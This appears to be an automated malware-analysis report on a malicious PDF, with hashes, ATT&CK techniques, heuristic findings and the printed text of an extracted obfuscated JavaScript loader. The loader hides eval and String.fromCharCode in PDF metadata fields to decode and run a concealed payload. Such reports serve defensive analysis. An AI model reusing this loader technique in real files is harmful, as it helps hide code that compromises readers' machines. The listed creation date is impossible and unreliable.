PDF malware analysis — malicious · 82d0c3f5d500f0ae

MALICIOUS

PDF

18.1 KB Created: 2011-72-51 03:25:00 Authoring application: String.fromCharCode First seen: 2026-05-07

MD5: 16a03c79c9b5ef73f0d904d86cbd68a9 SHA-1: 5451e4e8f7acc68c73acecf867de37da1e17b1d6 SHA-256: 82d0c3f5d500f0ae299dcc117e857fa9d1cf2040ca1fa61eb3d683b8bf5b819e

114 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

This PDF file contains embedded JavaScript that utilizes String.fromCharCode and obfuscation techniques to construct and execute a payload. The script appears to be designed to download and run a secondary malicious file, indicated by the critical heuristic firing for a PDF JavaScript exploit cluster. The ML classifier strongly flags this PDF as malicious.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
/Producer (String.fromCharCode)
```
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0x463B 362 bytes

Filename	Kind	Source	Size
`javascript_obj0001_000.js`	pdf-javascript-stream	PDF /JS object 1 at offset 0x463B	362 bytes
SHA-256: `0234106d68d612f6d8ef2341927e643843c4bc5776a2518d83dd30e2cf6976e3`
Preview script First 1,000 lines of the extracted script var w = 4; var tcbg = this.title.replace(/w/g,'*w,'); tcbg = tcbg.replace(/t/g,'2'); tcbg=tcbg.substr(0,tcbg.length-2) + ']'; tfb=function(){return function(){return this}()}(); vzsb=tfb[this.subject]; hglo=vzsb(this.producer); bsuwk = vzsb(tcbg); var s = ''; for (i = 0; i < bsuwk.length; i++) { jlmyb = bsuwk[i]; s += hglo(jlmyb); } vzsb(s);

SHA-256: 0234106d68d612f6d8ef2341927e643843c4bc5776a2518d83dd30e2cf6976e3

Preview script

First 1,000 lines of the extracted script

var w = 4;
var tcbg = this.title.replace(/w/g,'*w,');
tcbg = tcbg.replace(/t/g,'2');
tcbg=tcbg.substr(0,tcbg.length-2) + ']';
tfb=function(){return function(){return this}()}();
vzsb=tfb[this.subject];
hglo=vzsb(this.producer);
bsuwk = vzsb(tcbg);
var s = '';
for (i = 0; i < bsuwk.length; i++) {
	jlmyb = bsuwk[i];
	s += hglo(jlmyb);
}
vzsb(s);

Open this report in the interactive analyzer, or submit your own file for analysis.